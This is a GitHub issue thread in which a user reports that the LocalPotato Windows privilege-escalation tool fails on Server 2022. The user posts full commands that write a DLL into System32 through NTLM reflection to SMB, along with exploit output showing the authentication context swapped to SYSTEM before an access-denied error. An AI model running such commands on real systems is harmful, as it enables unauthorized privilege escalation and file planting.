### ISSUE TITLE
Not working, 0xc0000022

### ISSUE THREAD

**Issue by xrails365** [antonioCoco/RemotePotato0#12]
.\potato.exe -i .\test.dll -o \Windows\System32\WindowsPowerShell\v1.0\test.dll
[*] Objref Moniker Display Name = objref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGAQAAAAAAAADLsjChwUZEPSIumNoziSRiAggAAIwcJEdvbpV2qmFfZjMAHQAHAFIATQBUAEUAQwBIAC0AUwBSAFYAMAAxAAAABwAxADkAMgAuADEANgA4AC4AMAAuADEAMAAAAAAACQD//wAAHgD//wAAEAD//wAACgD//wAAFgD//wAAHwD//wAADgD//wAAAAA=:
[*] Calling CoGetInstanceFromIStorage with CLSID:{854A20FB-2D44-457D-992F-EF13785D2B51}
[*] Marshalling the IStorage object... IStorageTrigger written: 100 bytes
[*] Received DCOM NTLM type 1 authentication from the privileged client
[*] Connected to the SMB server with ip 127.0.0.1 and port 445
[+] SMB Client Auth Context swapped with SYSTEM
[+] RPC Server Auth Context swapped with the Current User
[*] Received DCOM NTLM type 3 authentication from the privileged client
[+] SMB reflected DCOM authentication succeeded!
[!] SMB Connect Tree: \\127.0.0.1\c$ failed with status code 0xc0000022

.\potato.exe -i .\test.dll -o \Windows\System32\WindowsPowerShell\v1.0\test.dll -c {A9819296-E5B3-4E67-8226-5E72CE9E1FB7}
[*] Objref Moniker Display Name = objref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGAQAAAAAAAACGlaXLQvY5VM9S4JnYdhSJAqAAAExGqArD98xzVey/UDMAHQAHAFIATQBUAEUAQwBIAC0AUwBSAFYAMAAxAAAABwAxADkAMgAuADEANgA4AC4AMAAuADEAMAAAAAAACQD//wAAHgD//wAAEAD//wAACgD//wAAFgD//wAAHwD//wAADgD//wAAAAA=:
[*] Calling CoGetInstanceFromIStorage with CLSID:{A9819296-E5B3-4E67-8226-5E72CE9E1FB7}
[*] Marshalling the IStorage object... IStorageTrigger written: 100 bytes
[*] Received DCOM NTLM type 1 authentication from the privileged client
[*] Connected to the SMB server with ip 127.0.0.1 and port 445
[+] SMB Client Auth Context swapped with SYSTEM
[+] RPC Server Auth Context swapped with the Current User
[*] Received DCOM NTLM type 3 authentication from the privileged client
[+] SMB reflected DCOM authentication succeeded!
[!] SMB Connect Tree: \\127.0.0.1\c$ failed with status code 0xc0000022

This is for LocalPotato project, apperently I was locked from posing issues there.
The same issue with any CLSID with any 2022 server.

**Comment by antonioCoco** [comment]
open the issue on the proper repo

**Comment by xrails365** [comment]
> You can't perform that action at this time.  
I can't the owner locked me out
